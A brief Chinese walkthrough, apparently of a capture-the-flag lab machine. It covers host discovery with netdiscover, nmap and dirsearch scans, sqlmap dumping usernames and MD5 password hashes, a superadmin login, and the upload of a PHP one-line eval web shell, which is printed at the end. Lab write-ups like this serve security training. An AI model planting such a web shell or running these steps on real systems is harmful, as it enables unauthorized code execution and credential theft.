1.获取ip
使用 kali 自带的 netdiscover, 扫描本网段除 kali 的 ip 之外存活的 ip 就是 靶机的 ip
netdiscover -i eth0 -r 192.168.187.0/24 //root执行
2.端口扫描
nmap -T4 -sV -O -p22,80 x.x.x.x
识别出开放两个端口22,80
3.扫描目录
dirsearch -u x.x.x.x
4.访问/register.php
5.创建用户
密码为123456的用户admin并登录
6.sqlmap跑
user1 user2 user3 test superadmin test1 admin | 5d41402abc4b2a76b9719d911017c592 6269c4f71a55b24bad0f0267d9be5508 0f359740bd1cda994f8b55330c86d845 05a671c66aefea124cc08b76ea6d30bb 2386acb2cf356944177746fc92523983 05a671c66aefea124cc08b76ea6d30bb e10adc3949ba59abbe56e057f20f883e |
7.登录superadmin
8.上传一句话木马文件
<?php @eval($_GET[cmd]);?>